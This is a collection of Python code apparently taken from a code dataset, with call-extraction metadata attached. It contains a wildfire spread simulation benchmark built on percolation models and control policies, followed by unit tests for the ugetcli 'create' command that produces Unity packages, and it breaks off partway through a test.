955), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((1147, 1154), 'snuba.clickhouse.columns.UInt', 'UInt', (['(8)'], {}), '(8)\n', (1151, 1154), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((1326, 1335), 'snuba.clickhouse.columns.Float', 'Float', (['(64)'], {}), '(64)\n', (1331, 1335), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((1455, 1461), 'snuba.clickhouse.columns.Date', 'Date', ([], {}), '()\n', (1459, 1461), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((1463, 1469), 'snuba.clickhouse.columns.Date', 'Date', ([], {}), '()\n', (1467, 1469), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((1550, 1560), 'snuba.clickhouse.columns.DateTime', 'DateTime', ([], {}), '()\n', (1558, 1560), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((1570, 1580), 'snuba.clickhouse.columns.DateTime', 'DateTime', ([], {}), '()\n', (1578, 1580), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((2652, 2678), 'snuba.clickhouse.columns.Enum', 'Enum', (["[('a', 1), ('b', 2)]"], {}), "([('a', 1), ('b', 2)])\n", (2656, 2678), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((2688, 2714), 'snuba.clickhouse.columns.Enum', 'Enum', (["[('a', 1), ('b', 2)]"], {}), "([('a', 1), ('b', 2)])\n", (2692, 2714), False, 'from snuba.clickhouse.columns import UUID, AggregateFunction, Array, ColumnType, Date, DateTime, Enum, FixedString, Float, IPv4, IPv6, Nested, ReadOnly\n'), ((3035, 3053), 'copy.deepcopy', 'deepcopy', (['col_type'], {}), '(col_type)\n', (3043, 3053), False, 'from copy import deepcopy\n'), ((414, 437), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (422, 437), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((564, 587), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'readonly': '(True)'}), '(readonly=True)\n', (572, 587), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((619, 642), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (627, 642), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((730, 753), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (738, 753), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((818, 841), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (826, 841), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((906, 929), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (914, 929), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((981, 1004), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (989, 1004), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((1113, 1136), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (1121, 1136), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((1173, 1196), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (1181, 1196), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((1292, 1315), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (1300, 1315), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((1355, 1378), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (1363, 1378), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((1476, 1499), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (1484, 1499), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((1599, 1622), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (1607, 1622), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((1756, 1764), 'snuba.clickhouse.columns.String', 'String', ([], {}), '()\n', (1762, 1764), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((1781, 1789), 'snuba.clickhouse.columns.String', 'String', ([], {}), '()\n', (1787, 1789), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((1976, 1999), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (1984, 1999), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((2123, 2146), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (2131, 2146), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((2314, 2337), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (2322, 2337), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((2445, 2468), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (2453, 2468), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((2618, 2641), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (2626, 2641), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((3183, 3206), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'readonly': '(True)'}), '(readonly=True)\n', (3191, 3206), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((1715, 1738), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (1723, 1738), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((2294, 2301), 'snuba.clickhouse.columns.UInt', 'UInt', (['(8)'], {}), '(8)\n', (2298, 2301), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((2303, 2311), 'snuba.clickhouse.columns.UInt', 'UInt', (['(32)'], {}), '(32)\n', (2307, 2311), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((2377, 2384), 'snuba.clickhouse.columns.UInt', 'UInt', (['(8)'], {}), '(8)\n', (2381, 2384), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((2386, 2394), 'snuba.clickhouse.columns.UInt', 'UInt', (['(32)'], {}), '(32)\n', (2390, 2394), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((2435, 2442), 'snuba.clickhouse.columns.UInt', 'UInt', (['(8)'], {}), '(8)\n', (2439, 2442), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((3466, 3489), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'readonly': '(True)'}), '(readonly=True)\n', (3474, 3489), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n'), ((1910, 1918), 'snuba.clickhouse.columns.String', 'String', ([], {}), '()\n', (1916, 1918), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((2036, 2044), 'snuba.clickhouse.columns.String', 'String', ([], {}), '()\n', (2042, 2044), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((2055, 2063), 'snuba.clickhouse.columns.String', 'String', ([], {}), '()\n', (2061, 2063), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((2092, 2100), 'snuba.clickhouse.columns.String', 'String', ([], {}), '()\n', (2098, 2100), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((2111, 2119), 'snuba.clickhouse.columns.String', 'String', ([], {}), '()\n', (2117, 2119), False, 'from snuba.clickhouse.columns import String, UInt\n'), ((1936, 1959), 'snuba.clickhouse.columns.SchemaModifiers', 'Modifier', ([], {'nullable': '(True)'}), '(nullable=True)\n', (1944, 1959), True, 'from snuba.clickhouse.columns import SchemaModifiers as Modifier\n')] |
from collections import defaultdict
import itertools
import numpy as np
import pickle
import time
import warnings
from Analysis import binomial_pgf, BranchModel, StaticModel
from simulators.fires.UrbanForest import UrbanForest
from Policies import NCTfires, UBTfires, DWTfires, RHTfires, USTfires
from Utilities import fire_boundary, urban_boundary, forest_children, percolation_parameter, equivalent_percolation_control
np.seterr(all='raise')
def uniform():
# given alpha and beta, compute lattice probabilities for every (parent, child) pair
a = 0.2763
b = np.exp(-1/10)
p = percolation_parameter(a, b)
if p <= 0.5:
raise Warning('Percolation parameter {0:0.2f} is not supercritical'.format(p))
lattice_p = defaultdict(lambda: p)
# given (delta_alpha, delta_beta), construct the equivalent delta_p
delta_a = 0
delta_b = 0.4
dp = equivalent_percolation_control(a, b, delta_a, delta_b)
if p - dp >= 0.5:
raise Warning('Control is insufficient: p - dp = {0:0.2f} - {1:0.2f} = {2:0.2f}'.format(p, dp, p-dp))
control_p = defaultdict(lambda: dp)
control_ab = defaultdict(lambda: (delta_a, delta_b))
# or given delta_p, construct the equivalent (delta_alpha, delta_beta)
# delta_p = 0.4
# control_percolation = defaultdict(lambda: delta_p)
# control_gmdp = defaultdict(lambda: equivalent_gmdp_control(a, b, delta_p))
a = defaultdict(lambda: a)
b = defaultdict(lambda: b)
return a, b, lattice_p, control_p, control_ab
def nonuniform(simulation):
alpha_set = dict()
# beta_set = defaultdict(lambda: np.exp(-1/9))
beta_set = dict()
p_set = dict()
delta_beta = 0.35
control_gmdp = dict()
alpha_start = 0.2
alpha_end = 0.4
for r in range(simulation.dims[0]):
for c in range(simulation.dims[1]):
alpha_set[(r, c)] = alpha_start + (c/(simulation.dims[1]-1))*(alpha_end-alpha_start)
beta1 = np.exp(-1/5)
beta2 = np.exp(-1/10)
for r in range(simulation.dims[0]):
for c in range(simulation.dims[1]):
if c < simulation.dims[1]-simulation.urban_width:
beta_set[(r, c)] = beta1
else:
beta_set[(r, c)] = beta2
control_gmdp[(r, c)] = {'healthy': (alpha_set[(r, c)], 0),
'on_fire': (0, np.amin([delta_beta, beta_set[(r, c)]]))}
# set initial condition
initial_fire = []
r_center = np.floor((simulation.dims[0]-1)/2).astype(np.uint8)
c_center = np.floor((simulation.dims[1]-1)/2).astype(np.uint8)
delta_r = [k for k in range(-2, 3)]
delta_c = [k for k in range(-2, 3)]
deltas = itertools.product(delta_r, delta_c)
for (dr, dc) in deltas:
if dr == 0 and dc == 0:
continue
elif (dr == -2 or dr == 2) and (dc == -2 or dc == 2):
continue
elif dc == dr or dc == -dr:
continue
r, c = r_center + dr, c_center + dc
initial_fire.append((r, c))
# control_p = dict()
for tree_rc in simulation.group.keys():
for neighbor in simulation.group[tree_rc].neighbors:
p = percolation_parameter(alpha_set[neighbor], beta_set[tree_rc])
if p <= 0.5:
warnings.warn('p({0:0.2f}, {1:0.2f}) = {2:0.2f} <= 0.5'.format(alpha_set[neighbor],
beta_set[tree_rc], p))
p_set[(tree_rc, neighbor)] = p
# control_p[(tree_rc, neighbor)] = dict()
#
# for k in control_gmdp[neighbor].keys():
# da, db = control_gmdp[neighbor][k]
# dp = equivalent_percolation_control(alpha_set[neighbor], beta_set[tree_rc], da, db)
# if p - dp >= 0.5:
# warnings.warn('p - dp = {0:0.2f} - {1:0.2f} = {2:0.2f} >= 0.5'.format(p, dp, p - dp))
#
# control_p[(tree_rc, neighbor)][k] = dp
return alpha_set, beta_set, initial_fire, control_gmdp, p_set
def benchmark(simulation, branchmodel, policy, num_generations=1, num_simulations=1):
print('Running policy {0:s} with capacity {1:d} for {2:d} simulations'.format(policy.name,
policy.capacity,
num_simulations))
print('started at {0:s}'.format(time.strftime('%d-%b-%Y %H:%M')))
tic = time.clock()
results = dict()
staticmodel = StaticModel()
for seed in range(num_simulations):
np.random.seed(seed)
simulation.reset()
simulation.rng = seed
while not simulation.early_end:
branchmodel.reset()
branchmodel.set_boundary(fire_boundary(simulation))
if isinstance(policy, USTfires):
staticmodel.set_boundary(urban_boundary(simulation))
policy.urbanboundary = urban_boundary(simulation)
def children_function(p):
return forest_children(simulation, p)
branchmodel.set_children_function(children_function)
for _ in range(num_generations):
for process in branchmodel.GWprocesses.values():
for parent in process.current_parents:
if parent not in branchmodel.lattice_children:
branchmodel.lattice_children[parent] = branchmodel.children_function(parent)
if not isinstance(policy, USTfires):
policy.generate_map(branchmodel)
else:
policy.generate_map(branchmodel, staticmodel)
branchmodel.next_generation(policy)
if isinstance(policy, USTfires):
staticmodel.next_boundary(policy.control_decisions)
# apply control and update simulator
if not isinstance(policy, USTfires):
control = policy.control(branchmodel)
else:
control = policy.control(branchmodel, staticmodel)
simulation.update(control)
if (seed+1) % 10 == 0:
print('completed {0:d} simulations'.format((seed+1)))
results[seed] = {'healthy_trees': simulation.stats_trees[0]/np.sum(simulation.stats_trees),
'healthy_urban': simulation.stats_urban[0]/np.sum(simulation.stats_urban),
'razed_urban': simulation.stats_urban[3]/np.sum(simulation.stats_urban)}
toc = time.clock()
dt = toc - tic
print('finished at {0:s}'.format(time.strftime('%d-%b-%Y %H:%M')))
print('{0:0.2f}s = {1:0.2f}m = {2:0.2f}h elapsed'.format(dt, dt/60, dt/3600))
filename = policy.name + '_s' + str(num_simulations) + '.pkl'
output = open('results/' + filename, 'wb')
pickle.dump(results, output)
output.close()
print('median healthy trees: {0:0.2f}%'.format(100*np.median([results[s]['healthy_trees']
for s in results.keys()])))
print('median healthy urban developments: {0:0.2f}%'.format(100*np.median([results[s]['healthy_urban']
for s in results.keys()])))
print('median removed urban developments: {0:0.2f}%'.format(100*np.median([results[s]['razed_urban']
for s in results.keys()])))
# print('mean remaining trees: {0:0.2f}%'.format(100*np.mean(results)))
# print('minimum {0:0.2f}, maximum {1:0.2f}'.format(100*np.amin(results), 100*np.amax(results)))
# first, third = np.percentile(results, [25, 75])
# print('1st quartile {0:0.2f}, 3rd quartile {1:0.2f}'.format(100*first, 100*third))
return
if __name__ == '__main__':
# forest parameters
dimension = 50
urban_width = 10
# generate information for uniform or non-uniform case
# alpha, beta, lattice_parameters, control_percolation, control_gmdp = uniform(LatticeForest(dimension))
# alpha, beta, p_parameters, map_percolation, map_gmdp = nonuniform(LatticeForest(dimension))
alpha, beta, initial_fire, map_gmdp, p_parameters = nonuniform(UrbanForest(dimension, urban_width))
# sim = LatticeForest(dimension, alpha=alpha, beta=beta)
sim = UrbanForest(dimension, urban_width, initial_fire=initial_fire, alpha=alpha, beta=beta)
# define policy
cap = 6
pi = NCTfires(capacity=cap, alpha_set=alpha, beta_set=beta, control_map_gmdp=map_gmdp)
# pi = UBTfires(capacity=cap, alpha_set=alpha, beta_set=beta, control_map_gmdp=map_gmdp)
# pi = DWTfires(capacity=cap, alpha_set=alpha, beta_set=beta, control_map_gmdp=map_gmdp)
# pi = RHTfires(capacity=cap, horizon=1, alpha_set=alpha, beta_set=beta, control_map_gmdp=map_gmdp)
# pi = USTfires(capacity=cap, horizon=5, control_map_gmdp=map_gmdp, alpha_set=alpha, beta_set=beta)
# create branching process model approximation
bm = BranchModel(lattice_parameters=p_parameters, pgf=binomial_pgf)
sm = StaticModel()
benchmark(sim, bm, pi, num_generations=1, num_simulations=1000)
print()
| [
"Utilities.equivalent_percolation_control",
"time.clock",
"Utilities.urban_boundary",
"simulators.fires.UrbanForest.UrbanForest",
"Utilities.percolation_parameter",
"itertools.product",
"numpy.exp",
"numpy.random.seed",
"Utilities.fire_boundary",
"numpy.amin",
"Policies.NCTfires",
"numpy.floor... | [((423, 445), 'numpy.seterr', 'np.seterr', ([], {'all': '"""raise"""'}), "(all='raise')\n", (432, 445), True, 'import numpy as np\n'), ((575, 590), 'numpy.exp', 'np.exp', (['(-1 / 10)'], {}), '(-1 / 10)\n', (581, 590), True, 'import numpy as np\n'), ((597, 624), 'Utilities.percolation_parameter', 'percolation_parameter', (['a', 'b'], {}), '(a, b)\n', (618, 624), False, 'from Utilities import fire_boundary, urban_boundary, forest_children, percolation_parameter, equivalent_percolation_control\n'), ((745, 768), 'collections.defaultdict', 'defaultdict', (['(lambda : p)'], {}), '(lambda : p)\n', (756, 768), False, 'from collections import defaultdict\n'), ((884, 938), 'Utilities.equivalent_percolation_control', 'equivalent_percolation_control', (['a', 'b', 'delta_a', 'delta_b'], {}), '(a, b, delta_a, delta_b)\n', (914, 938), False, 'from Utilities import fire_boundary, urban_boundary, forest_children, percolation_parameter, equivalent_percolation_control\n'), ((1087, 1111), 'collections.defaultdict', 'defaultdict', (['(lambda : dp)'], {}), '(lambda : dp)\n', (1098, 1111), False, 'from collections import defaultdict\n'), ((1128, 1168), 'collections.defaultdict', 'defaultdict', (['(lambda : (delta_a, delta_b))'], {}), '(lambda : (delta_a, delta_b))\n', (1139, 1168), False, 'from collections import defaultdict\n'), ((1411, 1434), 'collections.defaultdict', 'defaultdict', (['(lambda : a)'], {}), '(lambda : a)\n', (1422, 1434), False, 'from collections import defaultdict\n'), ((1442, 1465), 'collections.defaultdict', 'defaultdict', (['(lambda : b)'], {}), '(lambda : b)\n', (1453, 1465), False, 'from collections import defaultdict\n'), ((1946, 1960), 'numpy.exp', 'np.exp', (['(-1 / 5)'], {}), '(-1 / 5)\n', (1952, 1960), True, 'import numpy as np\n'), ((1971, 1986), 'numpy.exp', 'np.exp', (['(-1 / 10)'], {}), '(-1 / 10)\n', (1977, 1986), True, 'import numpy as np\n'), ((2675, 2710), 'itertools.product', 'itertools.product', (['delta_r', 'delta_c'], {}), '(delta_r, delta_c)\n', (2692, 2710), False, 'import itertools\n'), ((4517, 4529), 'time.clock', 'time.clock', ([], {}), '()\n', (4527, 4529), False, 'import time\n'), ((4570, 4583), 'Analysis.StaticModel', 'StaticModel', ([], {}), '()\n', (4581, 4583), False, 'from Analysis import binomial_pgf, BranchModel, StaticModel\n'), ((6588, 6600), 'time.clock', 'time.clock', ([], {}), '()\n', (6598, 6600), False, 'import time\n'), ((6891, 6919), 'pickle.dump', 'pickle.dump', (['results', 'output'], {}), '(results, output)\n', (6902, 6919), False, 'import pickle\n'), ((8420, 8510), 'simulators.fires.UrbanForest.UrbanForest', 'UrbanForest', (['dimension', 'urban_width'], {'initial_fire': 'initial_fire', 'alpha': 'alpha', 'beta': 'beta'}), '(dimension, urban_width, initial_fire=initial_fire, alpha=alpha,\n beta=beta)\n', (8431, 8510), False, 'from simulators.fires.UrbanForest import UrbanForest\n'), ((8549, 8635), 'Policies.NCTfires', 'NCTfires', ([], {'capacity': 'cap', 'alpha_set': 'alpha', 'beta_set': 'beta', 'control_map_gmdp': 'map_gmdp'}), '(capacity=cap, alpha_set=alpha, beta_set=beta, control_map_gmdp=\n map_gmdp)\n', (8557, 8635), False, 'from Policies import NCTfires, UBTfires, DWTfires, RHTfires, USTfires\n'), ((9086, 9148), 'Analysis.BranchModel', 'BranchModel', ([], {'lattice_parameters': 'p_parameters', 'pgf': 'binomial_pgf'}), '(lattice_parameters=p_parameters, pgf=binomial_pgf)\n', (9097, 9148), False, 'from Analysis import binomial_pgf, BranchModel, StaticModel\n'), ((9158, 9171), 'Analysis.StaticModel', 'StaticModel', ([], {}), '()\n', (9169, 9171), False, 'from Analysis import binomial_pgf, BranchModel, StaticModel\n'), ((4633, 4653), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (4647, 4653), True, 'import numpy as np\n'), ((8311, 8346), 'simulators.fires.UrbanForest.UrbanForest', 'UrbanForest', (['dimension', 'urban_width'], {}), '(dimension, urban_width)\n', (8322, 8346), False, 'from simulators.fires.UrbanForest import UrbanForest\n'), ((2462, 2500), 'numpy.floor', 'np.floor', (['((simulation.dims[0] - 1) / 2)'], {}), '((simulation.dims[0] - 1) / 2)\n', (2470, 2500), True, 'import numpy as np\n'), ((2529, 2567), 'numpy.floor', 'np.floor', (['((simulation.dims[1] - 1) / 2)'], {}), '((simulation.dims[1] - 1) / 2)\n', (2537, 2567), True, 'import numpy as np\n'), ((3161, 3222), 'Utilities.percolation_parameter', 'percolation_parameter', (['alpha_set[neighbor]', 'beta_set[tree_rc]'], {}), '(alpha_set[neighbor], beta_set[tree_rc])\n', (3182, 3222), False, 'from Utilities import fire_boundary, urban_boundary, forest_children, percolation_parameter, equivalent_percolation_control\n'), ((4473, 4504), 'time.strftime', 'time.strftime', (['"""%d-%b-%Y %H:%M"""'], {}), "('%d-%b-%Y %H:%M')\n", (4486, 4504), False, 'import time\n'), ((6657, 6688), 'time.strftime', 'time.strftime', (['"""%d-%b-%Y %H:%M"""'], {}), "('%d-%b-%Y %H:%M')\n", (6670, 6688), False, 'import time\n'), ((4821, 4846), 'Utilities.fire_boundary', 'fire_boundary', (['simulation'], {}), '(simulation)\n', (4834, 4846), False, 'from Utilities import fire_boundary, urban_boundary, forest_children, percolation_parameter, equivalent_percolation_control\n'), ((5002, 5028), 'Utilities.urban_boundary', 'urban_boundary', (['simulation'], {}), '(simulation)\n', (5016, 5028), False, 'from Utilities import fire_boundary, urban_boundary, forest_children, percolation_parameter, equivalent_percolation_control\n'), ((5091, 5121), 'Utilities.forest_children', 'forest_children', (['simulation', 'p'], {}), '(simulation, p)\n', (5106, 5121), False, 'from Utilities import fire_boundary, urban_boundary, forest_children, percolation_parameter, equivalent_percolation_control\n'), ((6347, 6377), 'numpy.sum', 'np.sum', (['simulation.stats_trees'], {}), '(simulation.stats_trees)\n', (6353, 6377), True, 'import numpy as np\n'), ((6447, 6477), 'numpy.sum', 'np.sum', (['simulation.stats_urban'], {}), '(simulation.stats_urban)\n', (6453, 6477), True, 'import numpy as np\n'), ((6545, 6575), 'numpy.sum', 'np.sum', (['simulation.stats_urban'], {}), '(simulation.stats_urban)\n', (6551, 6575), True, 'import numpy as np\n'), ((2354, 2391), 'numpy.amin', 'np.amin', (['[delta_beta, beta_set[r, c]]'], {}), '([delta_beta, beta_set[r, c]])\n', (2361, 2391), True, 'import numpy as np\n'), ((4935, 4961), 'Utilities.urban_boundary', 'urban_boundary', (['simulation'], {}), '(simulation)\n', (4949, 4961), False, 'from Utilities import fire_boundary, urban_boundary, forest_children, percolation_parameter, equivalent_percolation_control\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Functional tests for `ugetcli` package - `create` command.
Tests functionality of the cli create command with various options.
"""
import os
import unittest
import json
from click.testing import CliRunner
from mock import MagicMock, patch
from ugetcli import cli
from ugetcli.utils import create_empty_file
class TestUGetCliCreate(unittest.TestCase):
"""Functional Tests for `ugetcli` package - `create` command."""
@patch('ugetcli.uget.CsProj')
@patch('ugetcli.uget.UnityPackageRunner')
def test_cli_uget_create(
self, unitypackage_runner_mock, csproj_mock):
"""Test cli: uget create with default options"""
invocation_results = [False]
# Mock running Unity to export unity package
def export_unitypackage_mock(*args, **kwargs):
assert 'UnityProject' in args[0] # In temp folder
assert os.path.normpath('UnityProject/Assets/TestProject') in args[0]
assert os.path.normpath('Output/TestProject_1.0.0_Release.unitypackage') in args[1]
create_empty_file(args[1])
invocation_results[0] = True
return 0
unitypackage_runner_instance = MagicMock()
unitypackage_runner_instance.export_unitypackage = export_unitypackage_mock
unitypackage_runner_mock.return_value = unitypackage_runner_instance
csproj_instance = MagicMock()
csproj_instance.get_assembly_name.return_value = "TestProject"
csproj_instance.get_assembly_version.return_value = "1.0.0"
csproj_instance.get_output_path.return_value = "bin/Output/Debug"
csproj_instance.path = "TestProject.csproj"
csproj_mock.return_value = csproj_instance
csproj_mock.get_csproj_at_path.return_value = "TestProject.csproj"
runner = CliRunner(env={})
with runner.isolated_filesystem():
os.makedirs("bin/Output/Debug")
create_empty_file("bin/Output/Debug/TestProject.dll")
create_empty_file("bin/Output/Debug/TestProject.pdb")
result = runner.invoke(cli.ugetcli, ['create'], obj={})
assert result.exit_code == 0, result
unitypackage_runner_mock.assert_called_with(False)
assert invocation_results[0], "did not invoke export_unitypackage_mock"
@patch('ugetcli.uget.CsProj')
@patch('ugetcli.uget.UnityPackageRunner')
def test_cli_uget_create_with_path_directory(
self, unitypackage_runner_mock, csproj_mock):
"""Test cli: uget create with --path option when path is a directory"""
invocation_results = [False]
# Mock running Unity to export unity package
def export_unitypackage_mock(*args, **kwargs):
assert 'UnityProject' in args[0] # In temp folder
assert os.path.normpath('UnityProject/Assets/TestProject') in args[0]
assert os.path.normpath('Output/TestProject_1.0.0_Release.unitypackage') in args[1]
create_empty_file(args[1])
invocation_results[0] = True
return 0
unitypackage_runner_instance = MagicMock()
unitypackage_runner_instance.export_unitypackage = export_unitypackage_mock
unitypackage_runner_mock.return_value = unitypackage_runner_instance
csproj_instance = MagicMock()
csproj_instance.get_assembly_name.return_value = "TestProject"
csproj_instance.get_assembly_version.return_value = "1.0.0"
csproj_instance.get_output_path.return_value = "bin/Output/Debug"
csproj_instance.path = "custom/MyProject.csproj"
csproj_mock.return_value = csproj_instance
runner = CliRunner(env={})
with runner.isolated_filesystem():
os.makedirs("custom/bin/Output/Debug")
create_empty_file("custom/bin/Output/Debug/TestProject.dll")
create_empty_file("custom/bin/Output/Debug/TestProject.pdb")
result = runner.invoke(cli.ugetcli, ['create', '--path', 'custom/'], obj={})
assert result.exit_code == 0, result
unitypackage_runner_mock.assert_called_with(False)
csproj_mock.assert_called_with('custom/')
assert invocation_results[0], "did not invoke export_unitypackage_mock"
@patch('ugetcli.uget.CsProj')
@patch('ugetcli.uget.UnityPackageRunner')
def test_cli_uget_create_with_path_file(
self, unitypackage_runner_mock, csproj_mock):
"""Test cli: uget create with --path option when path is a .csproj file"""
invocation_results = [False]
# Mock running Unity to export unity package
def export_unitypackage_mock(*args, **kwargs):
assert 'UnityProject' in args[0] # In temp folder
assert os.path.normpath('UnityProject/Assets/TestProject') in args[0]
assert os.path.normpath('Output/TestProject_1.0.0_Release.unitypackage') in args[1]
create_empty_file(args[1])
invocation_results[0] = True
return 0
unitypackage_runner_instance = MagicMock()
unitypackage_runner_instance.export_unitypackage = export_unitypackage_mock
unitypackage_runner_mock.return_value = unitypackage_runner_instance
csproj_instance = MagicMock()
csproj_instance.get_assembly_name.return_value = "TestProject"
csproj_instance.get_assembly_version.return_value = "1.0.0"
csproj_instance.get_output_path.return_value = "bin/Output/Debug"
csproj_instance.path = "custom/MyProject.csproj"
csproj_mock.return_value = csproj_instance
runner = CliRunner(env={})
with runner.isolated_filesystem():
os.makedirs("custom/bin/Output/Debug")
create_empty_file("custom/bin/Output/Debug/TestProject.dll")
create_empty_file("custom/bin/Output/Debug/TestProject.pdb")
result = runner.invoke(cli.ugetcli, ['create', '--path', 'custom/MyProject.csproj'], obj={})
assert result.exit_code == 0, result
unitypackage_runner_mock.assert_called_with(False)
csproj_mock.assert_called_with('custom/MyProject.csproj')
assert invocation_results[0], "did not invoke export_unitypackage_mock"
@patch('ugetcli.uget.CsProj')
@patch('ugetcli.uget.UnityPackageRunner')
def test_cli_uget_create_with_output_dir(
self, unitypackage_runner_mock, csproj_mock):
"""Test cli: uget create with --output-dir option"""
invocation_results = [False]
# Mock running Unity to export unity package
def export_unitypackage_mock(*args, **kwargs):
assert 'UnityProject' in args[0] # In temp folder
assert os.path.normpath('UnityProject/Assets/TestProject') in args[0]
assert os.path.normpath('out/TestProject_1.0.0_Release.unitypackage') in args[1]
create_empty_file(args[1])
invocation_results[0] = True
return 0
unitypackage_runner_instance = MagicMock()
unitypackage_runner_instance.export_unitypackage = export_unitypackage_mock
unitypackage_runner_mock.return_value = unitypackage_runner_instance
csproj_instance = MagicMock()
csproj_instance.get_assembly_name.return_value = "TestProject"
csproj_instance.get_assembly_version.return_value = "1.0.0"
csproj_instance.get_output_path.return_value = "bin/Output/Debug"
csproj_instance.path = "TestProject.csproj"
csproj_mock.return_value = csproj_instance
runner = CliRunner(env={})
with runner.isolated_filesystem():
os.makedirs("bin/Output/Debug")
create_empty_file("bin/Output/Debug/TestProject.dll")
create_empty_file("bin/Output/Debug/TestProject.pdb")
result = runner.invoke(cli.ugetcli, ['create', '--output-dir', 'out'], obj={})
assert result.exit_code == 0, result
unitypackage_runner_mock.assert_called_with(False)
assert invocation_results[0], "did not invoke export_unitypackage_mock"
@patch('ugetcli.uget.CsProj')
@patch('ugetcli.uget.UnityPackageRunner')
def test_cli_uget_create_with_configuration(
self, unitypackage_runner_mock, csproj_mock):
"""Test cli: uget create with --configuration option"""
invocation_results = [False]
# Mock running Unity to export unity package
def export_unitypackage_mock(*args, **kwargs):
assert 'UnityProject' in args[0] # In temp folder
assert os.path.normpath('UnityProject/Assets/TestProject') in args[0]
assert os.path.normpath('Output/TestProject_1.0.0_Debug.unitypackage') in args[1]
create_empty_file(args[1])
invocation_results[0] = True
return 0
unitypackage_runner_instance = MagicMock()
